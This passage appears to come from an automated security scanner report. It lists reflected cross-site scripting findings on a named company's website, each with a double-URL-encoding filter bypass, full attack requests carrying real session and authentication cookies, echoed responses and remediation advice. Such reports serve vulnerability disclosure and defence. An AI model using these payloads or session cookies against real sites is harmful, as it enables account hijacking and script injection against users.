The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14c7d%2522%253balert%25281%2529%252f%252fe3ac5dd71b4 was submitted in the REST URL parameter 1. This input was echoed as 14c7d";alert(1)//e3ac5dd71b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography14c7d%2522%253balert%25281%2529%252f%252fe3ac5dd71b4/posters-and-cds.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography14c7d";alert(1)//e3ac5dd71b4/posters-and-cds.html","E404") ;
   </script>
...[SNIP]...

1.24. http://www.sigmaaldrich.com/analytical-chromatography/posters-and-cds.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/posters-and-cds.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81ff0%2522%253balert%25281%2529%252f%252fb80a4680748 was submitted in the REST URL parameter 2. This input was echoed as 81ff0";alert(1)//b80a4680748 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/81ff0%2522%253balert%25281%2529%252f%252fb80a4680748 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/81ff0";alert(1)//b80a4680748","E404") ;
   </script>
...[SNIP]...

1.25. http://www.sigmaaldrich.com/analytical-chromatography/sample-preparation.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/sample-preparation.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45c61%2522%253balert%25281%2529%252f%252febf1f616a2b was submitted in the REST URL parameter 1. This input was echoed as 45c61";alert(1)//ebf1f616a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography45c61%2522%253balert%25281%2529%252f%252febf1f616a2b/sample-preparation.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography45c61";alert(1)//ebf1f616a2b/sample-preparation.html","E404") ;
   </script>
...[SNIP]...

1.26. http://www.sigmaaldrich.com/analytical-chromatography/sample-preparation.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/sample-preparation.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6767%2522%253balert%25281%2529%252f%252f898fa123b9b was submitted in the REST URL parameter 2. This input was echoed as a6767";alert(1)//898fa123b9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/a6767%2522%253balert%25281%2529%252f%252f898fa123b9b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:11 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/a6767";alert(1)//898fa123b9b","E404") ;
   </script>
...[SNIP]...

1.27. http://www.sigmaaldrich.com/analytical-chromatography/spectroscopy.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/spectroscopy.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61f4e%2522%253balert%25281%2529%252f%252fe9e12b0b0d7 was submitted in the REST URL parameter 1. This input was echoed as 61f4e";alert(1)//e9e12b0b0d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography61f4e%2522%253balert%25281%2529%252f%252fe9e12b0b0d7/spectroscopy.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography61f4e";alert(1)//e9e12b0b0d7/spectroscopy.html","E404") ;
   </script>
...[SNIP]...

1.28. http://www.sigmaaldrich.com/analytical-chromatography/spectroscopy.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/spectroscopy.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f392b%2522%253balert%25281%2529%252f%252f68a7435bb01 was submitted in the REST URL parameter 2. This input was echoed as f392b";alert(1)//68a7435bb01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/f392b%2522%253balert%25281%2529%252f%252f68a7435bb01 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
